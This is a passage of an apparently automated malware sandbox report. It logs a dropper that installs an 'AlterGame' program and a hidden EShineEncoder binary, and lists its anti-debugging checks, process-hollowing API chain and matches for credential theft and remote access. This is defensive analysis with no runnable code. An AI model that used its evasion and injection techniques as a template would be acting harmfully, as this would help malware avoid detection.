            Source: C:\Users\user\AppData\Roaming\0L1IPDf6p\NqISs1vOr.exeFile created: C:\Users\user\AppData\Local\Temp\is-JSG7N.tmp\NqISs1vOr.tmpJump to dropped file
            Source: C:\Users\user\AppData\Local\Temp\is-JSG7N.tmp\NqISs1vOr.tmpFile created: C:\Users\user\AppData\Local\AlterGame 1.13\is-PR9GR.tmpJump to dropped file
            Source: C:\Users\user\AppData\Local\Temp\is-JSG7N.tmp\NqISs1vOr.tmpFile created: C:\Users\user\AppData\Local\Temp\is-DPC68.tmp\_isetup\_setup64.tmpJump to dropped file
            Source: C:\Users\user\AppData\Local\AlterGame 1.13\altergame32.exeFile created: C:\ProgramData\EShineEncoder\EShineEncoder.exeJump to dropped file
            Source: C:\Users\user\AppData\Local\Temp\is-JSG7N.tmp\NqISs1vOr.tmpFile created: C:\Users\user\AppData\Local\AlterGame 1.13\ltkrn13n.dll (copy)Jump to dropped file
            Source: C:\Users\user\AppData\Local\Temp\is-JSG7N.tmp\NqISs1vOr.tmpFile created: C:\Users\user\AppData\Local\AlterGame 1.13\msvcr71.dll (copy)Jump to dropped file
            Source: C:\Users\user\AppData\Local\Temp\is-JSG7N.tmp\NqISs1vOr.tmpFile created: C:\Users\user\AppData\Local\AlterGame 1.13\is-NKP4B.tmpJump to dropped file
            Source: C:\Users\user\Desktop\file.exeFile created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\3D003UC5\PAB1[1].fileJump to dropped file
            Source: C:\Users\user\AppData\Local\Temp\is-JSG7N.tmp\NqISs1vOr.tmpFile created: C:\Users\user\AppData\Local\Temp\is-DPC68.tmp\_isetup\_iscrypt.dllJump to dropped file
            Source: C:\Users\user\AppData\Local\Temp\is-JSG7N.tmp\NqISs1vOr.tmpFile created: C:\Users\user\AppData\Local\Temp\is-DPC68.tmp\_isetup\_shfoldr.dllJump to dropped file
            Source: C:\Users\user\AppData\Local\Temp\is-JSG7N.tmp\NqISs1vOr.tmpFile created: C:\Users\user\AppData\Local\AlterGame 1.13\is-GSS65.tmpJump to dropped file
            Source: C:\Users\user\AppData\Local\Temp\is-JSG7N.tmp\NqISs1vOr.tmpFile created: C:\Users\user\AppData\Local\AlterGame 1.13\altergame32.exeJump to dropped file
            Source: C:\Users\user\AppData\Local\Temp\is-JSG7N.tmp\NqISs1vOr.tmpFile created: C:\Users\user\AppData\Local\AlterGame 1.13\msvcp71.dll (copy)Jump to dropped file
            Source: C:\Users\user\AppData\Local\AlterGame 1.13\altergame32.exeFile created: C:\ProgramData\EShineEncoder\sqlite3.dllJump to dropped file
            Source: C:\Users\user\AppData\Local\Temp\is-JSG7N.tmp\NqISs1vOr.tmpFile created: C:\Users\user\AppData\Local\AlterGame 1.13\bjpeg23.dll (copy)Jump to dropped file
            Source: C:\Users\user\AppData\Local\Temp\is-JSG7N.tmp\NqISs1vOr.tmpFile created: C:\Users\user\AppData\Local\AlterGame 1.13\is-QDBOH.tmpJump to dropped file
            Source: C:\Users\user\Desktop\file.exeFile created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\ZJCZETOO\ONE[1].fileJump to dropped file
            Source: C:\Users\user\AppData\Local\Temp\is-JSG7N.tmp\NqISs1vOr.tmpFile created: C:\Users\user\AppData\Local\AlterGame 1.13\uninstall\is-CUGJK.tmpJump to dropped file
            Source: C:\Users\user\AppData\Local\Temp\is-JSG7N.tmp\NqISs1vOr.tmpFile created: C:\Users\user\AppData\Local\AlterGame 1.13\is-28G11.tmpJump to dropped file
            Source: C:\Users\user\Desktop\file.exeFile created: C:\Users\user\AppData\Roaming\xMs8rtQRv7K\ebAAb6KfuCx7.exeJump to dropped file
            Source: C:\Users\user\AppData\Local\Temp\is-JSG7N.tmp\NqISs1vOr.tmpFile created: C:\Users\user\AppData\Local\AlterGame 1.13\LTDIS13n.dll (copy)Jump to dropped file
            Source: C:\Users\user\AppData\Local\Temp\is-JSG7N.tmp\NqISs1vOr.tmpFile created: C:\Users\user\AppData\Local\AlterGame 1.13\is-HKUEM.tmpJump to dropped file
            Source: C:\Users\user\AppData\Local\Temp\is-JSG7N.tmp\NqISs1vOr.tmpFile created: C:\Users\user\AppData\Local\AlterGame 1.13\is-T3HEM.tmpJump to dropped file
            Source: C:\Users\user\Desktop\file.exeFile created: C:\Users\user\AppData\Roaming\0L1IPDf6p\NqISs1vOr.exeJump to dropped file
            Source: C:\Users\user\AppData\Local\Temp\is-JSG7N.tmp\NqISs1vOr.tmpFile created: C:\Users\user\AppData\Local\AlterGame 1.13\uninstall\unins000.exe (copy)Jump to dropped file
            Source: C:\Users\user\AppData\Local\Temp\is-JSG7N.tmp\NqISs1vOr.tmpFile created: C:\Users\user\AppData\Local\AlterGame 1.13\gdiplus.dll (copy)Jump to dropped file
            Source: C:\Users\user\AppData\Local\Temp\is-JSG7N.tmp\NqISs1vOr.tmpFile created: C:\Users\user\AppData\Local\AlterGame 1.13\sqlite3.dll (copy)Jump to dropped file

            Boot Survival

            Source: C:\Users\user\AppData\Local\AlterGame 1.13\altergame32.exeCode function: CreateFileA,DeviceIoControl,GetLastError,CloseHandle, \\.\PhysicalDrive06_2_00401A4F
            Source: C:\Users\user\AppData\Local\AlterGame 1.13\altergame32.exeCode function: CreateFileA,DeviceIoControl,GetLastError,CloseHandle, \\.\PhysicalDrive06_2_02E4F8A2
            Source: C:\Users\user\AppData\Local\Temp\is-JSG7N.tmp\NqISs1vOr.tmpCode function: 3_2_00423C04 IsIconic,PostMessageA,PostMessageA,PostMessageA,SendMessageA,IsWindowEnabled,IsWindowEnabled,IsWindowVisible,GetFocus,SetFocus,SetFocus,IsIconic,GetFocus,SetFocus,3_2_00423C04
            Source: C:\Users\user\AppData\Local\Temp\is-JSG7N.tmp\NqISs1vOr.tmpCode function: 3_2_004241D4 IsIconic,SetActiveWindow,SetFocus,3_2_004241D4
            Source: C:\Users\user\AppData\Local\Temp\is-JSG7N.tmp\NqISs1vOr.tmpCode function: 3_2_0042418C IsIconic,SetActiveWindow,3_2_0042418C
            Source: C:\Users\user\AppData\Local\Temp\is-JSG7N.tmp\NqISs1vOr.tmpCode function: 3_2_0041837C IsIconic,GetWindowPlacement,GetWindowRect,GetWindowLongA,GetWindowLongA,ScreenToClient,ScreenToClient,3_2_0041837C
            Source: C:\Users\user\AppData\Local\Temp\is-JSG7N.tmp\NqISs1vOr.tmpCode function: 3_2_00422854 SendMessageA,ShowWindow,ShowWindow,CallWindowProcA,SendMessageA,ShowWindow,SetWindowPos,GetActiveWindow,IsIconic,SetWindowPos,SetActiveWindow,ShowWindow,3_2_00422854
            Source: C:\Users\user\AppData\Local\Temp\is-JSG7N.tmp\NqISs1vOr.tmpCode function: 3_2_00482EF8 IsIconic,GetWindowLongA,ShowWindow,ShowWindow,3_2_00482EF8
            Source: C:\Users\user\AppData\Local\Temp\is-JSG7N.tmp\NqISs1vOr.tmpCode function: 3_2_00417590 IsIconic,GetCapture,3_2_00417590
            Source: C:\Users\user\AppData\Local\Temp\is-JSG7N.tmp\NqISs1vOr.tmpCode function: 3_2_00417CC6 IsIconic,SetWindowPos,3_2_00417CC6
            Source: C:\Users\user\AppData\Local\Temp\is-JSG7N.tmp\NqISs1vOr.tmpCode function: 3_2_00417CC8 IsIconic,SetWindowPos,GetWindowPlacement,SetWindowPlacement,3_2_00417CC8
            Source: C:\Users\user\AppData\Local\Temp\is-JSG7N.tmp\NqISs1vOr.tmpCode function: 3_2_0041F110 GetVersion,SetErrorMode,LoadLibraryA,SetErrorMode,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,FreeLibrary,3_2_0041F110
            Source: C:\Users\user\AppData\Roaming\0L1IPDf6p\NqISs1vOr.exeProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\AppData\Local\Temp\is-JSG7N.tmp\NqISs1vOr.tmpProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\AppData\Roaming\xMs8rtQRv7K\ebAAb6KfuCx7.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\AppData\Roaming\xMs8rtQRv7K\ebAAb6KfuCx7.exeMemory allocated: E20000 memory reserve | memory write watchJump to behavior
            Source: C:\Users\user\AppData\Roaming\xMs8rtQRv7K\ebAAb6KfuCx7.exeMemory allocated: 1ADC0000 memory reserve | memory write watchJump to behavior
            Source: C:\Users\user\AppData\Local\AlterGame 1.13\altergame32.exeCode function: 6_2_60920C91 rdtsc 6_2_60920C91
            Source: C:\Users\user\AppData\Local\AlterGame 1.13\altergame32.exeCode function: LoadLibraryA,GetProcAddress,GetAdaptersInfo,FreeLibrary,6_2_00401B4B
            Source: C:\Users\user\AppData\Local\AlterGame 1.13\altergame32.exeCode function: LoadLibraryA,GetProcAddress,GetAdaptersInfo,FreeLibrary,6_2_02E4F9A6
            Source: C:\Users\user\AppData\Roaming\xMs8rtQRv7K\ebAAb6KfuCx7.exeThread delayed: delay time: 922337203685477Jump to behavior
            Source: C:\Users\user\AppData\Local\Temp\is-JSG7N.tmp\NqISs1vOr.tmpDropped PE file which has not been started: C:\Users\user\AppData\Local\AlterGame 1.13\bjpeg23.dll (copy)Jump to dropped file
            Source: C:\Users\user\AppData\Local\Temp\is-JSG7N.tmp\NqISs1vOr.tmpDropped PE file which has not been started: C:\Users\user\AppData\Local\AlterGame 1.13\is-QDBOH.tmpJump to dropped file
            Source: C:\Users\user\AppData\Local\Temp\is-JSG7N.tmp\NqISs1vOr.tmpDropped PE file which has not been started: C:\Users\user\AppData\Local\AlterGame 1.13\is-PR9GR.tmpJump to dropped file
            Source: C:\Users\user\AppData\Local\Temp\is-JSG7N.tmp\NqISs1vOr.tmpDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\is-DPC68.tmp\_isetup\_setup64.tmpJump to dropped file
            Source: C:\Users\user\AppData\Local\Temp\is-JSG7N.tmp\NqISs1vOr.tmpDropped PE file which has not been started: C:\Users\user\AppData\Local\AlterGame 1.13\ltkrn13n.dll (copy)Jump to dropped file
            Source: C:\Users\user\AppData\Local\Temp\is-JSG7N.tmp\NqISs1vOr.tmpDropped PE file which has not been started: C:\Users\user\AppData\Local\AlterGame 1.13\uninstall\is-CUGJK.tmpJump to dropped file
            Source: C:\Users\user\AppData\Local\Temp\is-JSG7N.tmp\NqISs1vOr.tmpDropped PE file which has not been started: C:\Users\user\AppData\Local\AlterGame 1.13\is-28G11.tmpJump to dropped file
            Source: C:\Users\user\AppData\Local\Temp\is-JSG7N.tmp\NqISs1vOr.tmpDropped PE file which has not been started: C:\Users\user\AppData\Local\AlterGame 1.13\LTDIS13n.dll (copy)Jump to dropped file
            Source: C:\Users\user\AppData\Local\Temp\is-JSG7N.tmp\NqISs1vOr.tmpDropped PE file which has not been started: C:\Users\user\AppData\Local\AlterGame 1.13\msvcr71.dll (copy)Jump to dropped file
            Source: C:\Users\user\AppData\Local\Temp\is-JSG7N.tmp\NqISs1vOr.tmpDropped PE file which has not been started: C:\Users\user\AppData\Local\AlterGame 1.13\is-NKP4B.tmpJump to dropped file
            Source: C:\Users\user\AppData\Local\Temp\is-JSG7N.tmp\NqISs1vOr.tmpDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\is-DPC68.tmp\_isetup\_iscrypt.dllJump to dropped file
            Source: C:\Users\user\AppData\Local\Temp\is-JSG7N.tmp\NqISs1vOr.tmpDropped PE file which has not been started: C:\Users\user\AppData\Local\AlterGame 1.13\is-HKUEM.tmpJump to dropped file
            Source: C:\Users\user\AppData\Local\Temp\is-JSG7N.tmp\NqISs1vOr.tmpDropped PE file which has not been started: C:\Users\user\AppData\Local\AlterGame 1.13\is-T3HEM.tmpJump to dropped file
            Source: C:\Users\user\AppData\Local\Temp\is-JSG7N.tmp\NqISs1vOr.tmpDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\is-DPC68.tmp\_isetup\_shfoldr.dllJump to dropped file
            Source: C:\Users\user\AppData\Local\Temp\is-JSG7N.tmp\NqISs1vOr.tmpDropped PE file which has not been started: C:\Users\user\AppData\Local\AlterGame 1.13\is-GSS65.tmpJump to dropped file
            Source: C:\Users\user\AppData\Local\Temp\is-JSG7N.tmp\NqISs1vOr.tmpDropped PE file which has not been started: C:\Users\user\AppData\Local\AlterGame 1.13\uninstall\unins000.exe (copy)Jump to dropped file
            Source: C:\Users\user\AppData\Local\Temp\is-JSG7N.tmp\NqISs1vOr.tmpDropped PE file which has not been started: C:\Users\user\AppData\Local\AlterGame 1.13\gdiplus.dll (copy)Jump to dropped file
            Source: C:\Users\user\AppData\Local\Temp\is-JSG7N.tmp\NqISs1vOr.tmpDropped PE file which has not been started: C:\Users\user\AppData\Local\AlterGame 1.13\msvcp71.dll (copy)Jump to dropped file
            Source: C:\Users\user\AppData\Roaming\0L1IPDf6p\NqISs1vOr.exeEvasive API call chain: GetSystemTime,DecisionNodesgraph_2-5687
            Source: C:\Users\user\Desktop\file.exeEvasive API call chain: GetModuleFileName,DecisionNodes,Sleepgraph_0-19430
            Source: C:\Users\user\AppData\Local\AlterGame 1.13\altergame32.exeEvasive API call chain: GetModuleFileName,DecisionNodes,Sleepgraph_6-60846
            Source: C:\Users\user\Desktop\file.exeEvasive API call chain: GetModuleFileName,DecisionNodes,ExitProcessgraph_0-19879
            Source: C:\Users\user\AppData\Local\AlterGame 1.13\altergame32.exeAPI coverage: 5.5 %
            Source: C:\Users\user\AppData\Local\AlterGame 1.13\altergame32.exe TID: 420Thread sleep count: 35 > 30Jump to behavior
            Source: C:\Users\user\AppData\Local\AlterGame 1.13\altergame32.exe TID: 420Thread sleep time: -70000s >= -30000sJump to behavior
            Source: C:\Users\user\AppData\Local\AlterGame 1.13\altergame32.exe TID: 4312Thread sleep count: 71 > 30Jump to behavior
            Source: C:\Users\user\AppData\Local\AlterGame 1.13\altergame32.exe TID: 4312Thread sleep time: -4260000s >= -30000sJump to behavior
            Source: C:\Users\user\AppData\Roaming\xMs8rtQRv7K\ebAAb6KfuCx7.exe TID: 396Thread sleep time: -922337203685477s >= -30000sJump to behavior
            Source: C:\Users\user\AppData\Local\AlterGame 1.13\altergame32.exeFile opened: PhysicalDrive0Jump to behavior
            Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
            Source: C:\Users\user\AppData\Local\AlterGame 1.13\altergame32.exeLast function: Thread delayed
            Source: C:\Users\user\AppData\Local\Temp\is-JSG7N.tmp\NqISs1vOr.tmpCode function: 3_2_00452A34 FindFirstFileA,GetLastError,3_2_00452A34
            Source: C:\Users\user\AppData\Local\Temp\is-JSG7N.tmp\NqISs1vOr.tmpCode function: 3_2_00474D70 FindFirstFileA,FindNextFileA,FindClose,3_2_00474D70
            Source: C:\Users\user\AppData\Local\Temp\is-JSG7N.tmp\NqISs1vOr.tmpCode function: 3_2_00462578 FindFirstFileA,FindNextFileA,FindClose,3_2_00462578
            Source: C:\Users\user\AppData\Local\Temp\is-JSG7N.tmp\NqISs1vOr.tmpCode function: 3_2_004975B0 FindFirstFileA,SetFileAttributesA,FindNextFileA,FindClose,3_2_004975B0
            Source: C:\Users\user\AppData\Local\Temp\is-JSG7N.tmp\NqISs1vOr.tmpCode function: 3_2_00463B04 SetErrorMode,FindFirstFileA,FindNextFileA,FindClose,SetErrorMode,3_2_00463B04
            Source: C:\Users\user\AppData\Local\Temp\is-JSG7N.tmp\NqISs1vOr.tmpCode function: 3_2_00463F80 SetErrorMode,FindFirstFileA,FindNextFileA,FindClose,SetErrorMode,3_2_00463F80
            Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00404250 SetFileAttributesW,GetCommConfig,EnumCalendarInfoW,GetLogicalDriveStringsA,SetComputerNameA,ChangeTimerQueueTimer,GetTempFileNameW,EnumTimeFormatsA,WriteConsoleInputW,GetVersionExA,InterlockedIncrement,GlobalUnWire,0_2_00404250
            Source: C:\Users\user\AppData\Roaming\0L1IPDf6p\NqISs1vOr.exeCode function: 2_2_00409B30 GetSystemInfo,VirtualQuery,VirtualProtect,VirtualProtect,VirtualQuery,2_2_00409B30
            Source: C:\Users\user\AppData\Local\AlterGame 1.13\altergame32.exeThread delayed: delay time: 60000Jump to behavior
            Source: altergame32.exe, 00000006.00000002.3049094019.00000000036D2000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW*k
            Source: altergame32.exe, 00000006.00000002.3049094019.00000000036D2000.00000004.00000020.00020000.00000000.sdmp, altergame32.exe, 00000006.00000002.3047839093.00000000009AE000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW
            Source: C:\Users\user\Desktop\file.exeAPI call chain: ExitProcess graph end nodegraph_0-19880
            Source: C:\Users\user\AppData\Roaming\0L1IPDf6p\NqISs1vOr.exeAPI call chain: ExitProcess graph end nodegraph_2-6727
            Source: C:\Users\user\AppData\Local\AlterGame 1.13\altergame32.exeAPI call chain: ExitProcess graph end nodegraph_6-61046
            Source: C:\Users\user\AppData\Local\Temp\is-JSG7N.tmp\NqISs1vOr.tmp Process information queried: ProcessInformation

            Anti Debugging

            Source: C:\Users\user\AppData\Local\AlterGame 1.13\altergame32.exeDebugger detection routine: QueryPerformanceCounter, DebugActiveProcess, DecisionNodes, ExitProcess or Sleepgraph_6-60742
            Source: C:\Users\user\AppData\Local\AlterGame 1.13\altergame32.exeCode function: 6_2_60920C91 rdtsc 6_2_60920C91
            Source: C:\Users\user\Desktop\file.exeCode function: 0_2_004080BA _memset,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,0_2_004080BA
            Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00404530 SetLastError,SetLastError,FindNextVolumeMountPointA,EnumTimeFormatsW,_calloc,__floor_pentium4,GetDllDirectoryW,OpenJobObjectA,InterlockedExchangeAdd,VirtualAlloc,GetLastError,GetDiskFreeSpaceExW,SetConsoleCP,GetSystemDefaultLCID,InterlockedExchange,GetDiskFreeSpaceExW,SetConsoleCP,GetSystemDefaultLCID,OutputDebugStringW,GetUserDefaultLangID,LoadLibraryW,ReadConsoleInputA,LCMapStringA,InterlockedIncrement,LCMapStringA,InterlockedIncrement,OpenEventW,GetCurrentProcess,GetCurrentProcess,GetLastError,GetFileAttributesA,GetShortPathNameW,SetComputerNameExA,GetFileAttributesA,GetShortPathNameW,SetComputerNameExA,FreeEnvironmentStringsW,GetComputerNameA,InterlockedExchange,LoadLibraryW,0_2_00404530
            Source: C:\Users\user\Desktop\file.exeCode function: 0_2_0040C415 LoadLibraryA,GetProcAddress,GetProcAddress,__encode_pointer,GetProcAddress,__encode_pointer,GetProcAddress,__encode_pointer,GetProcAddress,__encode_pointer,GetProcAddress,__encode_pointer,__decode_pointer,__decode_pointer,__decode_pointer,__decode_pointer,__decode_pointer,0_2_0040C415
            Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00567BE0 push dword ptr fs:[00000030h]0_2_00567BE0
            Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00630042 push dword ptr fs:[00000030h]0_2_00630042
            Source: C:\Users\user\AppData\Local\AlterGame 1.13\altergame32.exeCode function: 6_2_02E4648B RtlInitializeCriticalSection,GetModuleHandleA,GetModuleHandleA,GetProcAddress,GetProcAddress,GetModuleHandleA,GetProcAddress,GetTickCount,GetVersionExA,_malloc,_malloc,_malloc,_malloc,_malloc,_malloc,_malloc,_malloc,GetProcessHeap,GetProcessHeap,RtlAllocateHeap,RtlAllocateHeap,GetProcessHeap,RtlAllocateHeap,GetProcessHeap,RtlAllocateHeap,RtlEnterCriticalSection,RtlLeaveCriticalSection,_malloc,_malloc,_malloc,_malloc,QueryPerformanceCounter,Sleep,_malloc,_malloc,Sleep,RtlEnterCriticalSection,RtlLeaveCriticalSection,6_2_02E4648B
            Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00405090 __NMSG_WRITE,_raise,_memset,SetUnhandledExceptionFilter,UnhandledExceptionFilter,0_2_00405090
            Source: C:\Users\user\Desktop\file.exeCode function: 0_2_004080BA _memset,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,0_2_004080BA
            Source: C:\Users\user\Desktop\file.exeCode function: 0_2_0040824A SetUnhandledExceptionFilter,0_2_0040824A
            Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00407750 IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,0_2_00407750
            Source: C:\Users\user\AppData\Local\AlterGame 1.13\altergame32.exeCode function: 6_2_02E59528 SetUnhandledExceptionFilter,UnhandledExceptionFilter,6_2_02E59528
            Source: C:\Users\user\AppData\Roaming\xMs8rtQRv7K\ebAAb6KfuCx7.exe Memory allocated: page read and write | page guard

            HIPS / PFW / Operating System Protection Evasion

            Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00630110 VirtualAlloc,CreateProcessA,VirtualFree,VirtualAlloc,Wow64GetThreadContext,ReadProcessMemory,NtUnmapViewOfSection,VirtualAllocEx,NtWriteVirtualMemory,NtWriteVirtualMemory,WriteProcessMemory,Wow64SetThreadContext,ResumeThread,ExitProcess,0_2_00630110
            Source: C:\Users\user\Desktop\file.exe Memory written: C:\Users\user\Desktop\file.exe base: 400000 value starts with: 4D5A
            Source: C:\Users\user\AppData\Local\Temp\is-JSG7N.tmp\NqISs1vOr.tmpCode function: 3_2_00477F98 ShellExecuteEx,GetLastError,MsgWaitForMultipleObjects,GetExitCodeProcess,CloseHandle,3_2_00477F98
            Source: C:\Users\user\Desktop\file.exe Process created: C:\Users\user\Desktop\file.exe "C:\Users\user\Desktop\file.exe"
            Source: C:\Windows\SysWOW64\net.exe Process created: C:\Windows\SysWOW64\net1.exe C:\Windows\system32\net1 pause alter_game_11196
            Source: C:\Users\user\AppData\Local\Temp\is-JSG7N.tmp\NqISs1vOr.tmpCode function: 3_2_0042E094 AllocateAndInitializeSid,GetVersion,GetModuleHandleA,GetProcAddress,CheckTokenMembership,GetCurrentThread,OpenThreadToken,GetLastError,GetCurrentProcess,OpenProcessToken,GetTokenInformation,GetLastError,GetTokenInformation,EqualSid,CloseHandle,FreeSid,3_2_0042E094
            Source: C:\Users\user\Desktop\file.exeCode function: 0_2_0063AC0C cpuid 0_2_0063AC0C
            Source: C:\Users\user\Desktop\file.exeCode function: GetLocaleInfoA,0_2_0040FEBB
            Source: C:\Users\user\AppData\Roaming\0L1IPDf6p\NqISs1vOr.exeCode function: GetLocaleInfoA,2_2_004051FC
            Source: C:\Users\user\AppData\Roaming\0L1IPDf6p\NqISs1vOr.exeCode function: GetLocaleInfoA,2_2_00405248
            Source: C:\Users\user\AppData\Local\Temp\is-JSG7N.tmp\NqISs1vOr.tmpCode function: GetLocaleInfoA,3_2_00408558
            Source: C:\Users\user\AppData\Local\Temp\is-JSG7N.tmp\NqISs1vOr.tmpCode function: GetLocaleInfoA,3_2_004085A4
            Source: C:\Users\user\AppData\Roaming\xMs8rtQRv7K\ebAAb6KfuCx7.exe Queries volume information: C:\Users\user\AppData\Roaming\xMs8rtQRv7K\ebAAb6KfuCx7.exe VolumeInformation
            Source: C:\Users\user\AppData\Local\Temp\is-JSG7N.tmp\NqISs1vOr.tmpCode function: 3_2_004583E8 GetTickCount,QueryPerformanceCounter,GetSystemTimeAsFileTime,GetCurrentProcessId,CreateNamedPipeA,GetLastError,CreateFileA,SetNamedPipeHandleState,CreateProcessA,CloseHandle,CloseHandle,3_2_004583E8
            Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00408FA6 GetSystemTimeAsFileTime,GetCurrentProcessId,GetCurrentThreadId,GetTickCount,QueryPerformanceCounter,0_2_00408FA6
            Source: C:\Users\user\AppData\Local\Temp\is-JSG7N.tmp\NqISs1vOr.tmpCode function: 3_2_00455570 GetUserNameA,3_2_00455570
            Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00404250 SetFileAttributesW,GetCommConfig,EnumCalendarInfoW,GetLogicalDriveStringsA,SetComputerNameA,ChangeTimerQueueTimer,GetTempFileNameW,EnumTimeFormatsA,WriteConsoleInputW,GetVersionExA,InterlockedIncrement,GlobalUnWire,0_2_00404250

            Stealing of Sensitive Information

            Source: Yara matchFile source: 0.2.file.exe.6315a0.1.raw.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 00000000.00000002.1816901578.0000000000630000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000006.00000002.3048791159.0000000002E41000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000006.00000002.3048714500.0000000002D95000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: Process Memory Space: altergame32.exe PID: 2488, type: MEMORYSTR

            Remote Access Functionality

            Source: Yara matchFile source: 00000006.00000002.3048791159.0000000002E41000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000006.00000002.3048714500.0000000002D95000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: Process Memory Space: altergame32.exe PID: 2488, type: MEMORYSTR
            Source: C:\Users\user\AppData\Local\AlterGame 1.13\altergame32.exeCode function: 6_2_609660FA sqlite3_finalize,sqlite3_free,sqlite3_value_numeric_type,sqlite3_value_numeric_type,sqlite3_value_text,sqlite3_value_int,memcmp,sqlite3_free,sqlite3_free,sqlite3_free,sqlite3_strnicmp,sqlite3_mprintf,sqlite3_mprintf,sqlite3_malloc,sqlite3_free,sqlite3_mprintf,sqlite3_prepare_v2,sqlite3_free,sqlite3_bind_value,6_2_609660FA
            Source: C:\Users\user\AppData\Local\AlterGame 1.13\altergame32.exeCode function: 6_2_6090C1D6 sqlite3_clear_bindings,sqlite3_mutex_enter,sqlite3_mutex_leave,6_2_6090C1D6
            Source: C:\Users\user\AppData\Local\AlterGame 1.13\altergame32.exeCode function: 6_2_60963143 sqlite3_stricmp,sqlite3_bind_int64,sqlite3_mutex_leave,6_2_60963143
            Source: C:\Users\user\AppData\Local\AlterGame 1.13\altergame32.exeCode function: 6_2_6096A2BD sqlite3_bind_int64,sqlite3_step,sqlite3_column_int,sqlite3_reset,6_2_6096A2BD
            Source: C:\Users\user\AppData\Local\AlterGame 1.13\altergame32.exeCode function: 6_2_6096923E sqlite3_bind_int64,sqlite3_bind_int64,sqlite3_step,sqlite3_column_int64,sqlite3_reset,sqlite3_malloc,sqlite3_malloc,sqlite3_step,sqlite3_column_int64,sqlite3_reset,sqlite3_realloc,sqlite3_realloc,sqlite3_bind_int64,sqlite3_bind_int64,sqlite3_step,sqlite3_reset,sqlite3_free,sqlite3_free,sqlite3_free,6_2_6096923E
            Source: C:\Users\user\AppData\Local\AlterGame 1.13\altergame32.exeCode function: 6_2_6096A38C sqlite3_bind_int,sqlite3_column_int,sqlite3_step,sqlite3_reset,6_2_6096A38C
            Source: C:\Users\user\AppData\Local\AlterGame 1.13\altergame32.exeCode function: 6_2_6096748C sqlite3_malloc,sqlite3_bind_int,sqlite3_step,sqlite3_column_blob,sqlite3_column_bytes,sqlite3_reset,sqlite3_bind_int,sqlite3_step,sqlite3_column_int64,sqlite3_reset,sqlite3_malloc,sqlite3_bind_int64,sqlite3_column_bytes,sqlite3_column_blob,sqlite3_column_int64,sqlite3_column_int64,sqlite3_column_int64,sqlite3_step,sqlite3_reset,sqlite3_bind_int64,sqlite3_step,sqlite3_column_int,sqlite3_reset,sqlite3_bind_int64,sqlite3_bind_int,sqlite3_step,sqlite3_column_int64,sqlite3_column_int64,sqlite3_column_int64,sqlite3_column_bytes,sqlite3_column_blob,sqlite3_bind_int64,sqlite3_step,sqlite3_reset,sqlite3_reset,memcmp,sqlite3_free,sqlite3_free,sqlite3_free,sqlite3_free,sqlite3_reset,sqlite3_bind_int64,sqlite3_bind_int64,sqlite3_step,sqlite3_column_int,sqlite3_reset,sqlite3_step,sqlite3_column_int64,sqlite3_reset,sqlite3_bind_int64,sqlite3_realloc,sqlite3_column_int,sqlite3_step,sqlite3_reset,sqlite3_bind_int64,sqlite3_bind_int,sqlite3_bind_int,sqlite3_step,sqlite3_reset,sqlite3_free,sqlite3_free,sqlite3_free,sqlite3_free,sqlite3_free,sqlite3_free,sqlite3_free,sqlite3_bind_int,sqlite3_bind_blob,sqlite3_step,sqlite3_reset,sqlite3_free,sqlite3_free,6_2_6096748C
            Source: C:\Users\user\AppData\Local\AlterGame 1.13\altergame32.exeCode function: 6_2_609254B1 sqlite3_bind_zeroblob,sqlite3_mutex_leave,6_2_609254B1
            Source: C:\Users\user\AppData\Local\AlterGame 1.13\altergame32.exeCode function: 6_2_6094B407 sqlite3_bind_int64,sqlite3_step,sqlite3_reset,sqlite3_bind_int64,sqlite3_step,sqlite3_reset,6_2_6094B407
            Source: C:\Users\user\AppData\Local\AlterGame 1.13\altergame32.exeCode function: 6_2_6090F435 sqlite3_bind_parameter_index,6_2_6090F435
            Source: C:\Users\user\AppData\Local\AlterGame 1.13\altergame32.exeCode function: 6_2_609255D4 sqlite3_mutex_leave,sqlite3_bind_text16,6_2_609255D4
            Source: C:\Users\user\AppData\Local\AlterGame 1.13\altergame32.exeCode function: 6_2_609255FF sqlite3_bind_text,6_2_609255FF
